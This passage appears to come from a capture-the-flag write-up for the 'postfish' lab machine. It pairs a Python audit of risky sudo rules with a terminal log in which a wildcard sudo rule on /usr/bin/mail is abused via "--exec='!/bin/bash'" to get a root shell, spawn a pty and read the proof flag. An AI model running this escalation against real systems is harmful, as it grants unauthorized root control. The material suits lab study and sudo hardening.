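    return [{"rule": r, "issues": assess_rule(r)} for r in parse_sudo_l(output)]

# The listing shown above for the filter user (page content).
SAMPLE_SUDO_L = """\
Matching Defaults entries for filter on postfish:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User filter may run the following commands on postfish:
    (ALL) NOPASSWD: /usr/bin/mail *
"""

# Constructed counter-example: a fixed command line, a fixed run-as user, password required.
HARDENED_SUDO_L = """\
User filter may run the following commands on postfish:
    (root) /usr/bin/mail -s Alert root
"""

if __name__ == "__main__":
    for entry in audit_sudo_l(SAMPLE_SUDO_L):
        print(entry["rule"])
        for issue in entry["issues"]:
            print("  -", issue)
```

If the filter really must send mail as another user, the rule should name the exact arguments; a wildcard after a program that can run a shell is equivalent to granting the shell.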
filter@postfish:/var/spool/postfix$ sudo mail --exec='!/bin/bash'
sudo mail --exec='!/bin/bash'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
# Upgrade shell to interactive
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@postfish:/var/spool/postfix# cd /root
cd /root
root@postfish:~# ls
ls
disclaimer disclaimer.sh mail.sh proof.txt snap
root@postfish:~# cat proof
cat proof.txt
97c543<REDACTED>40ae9071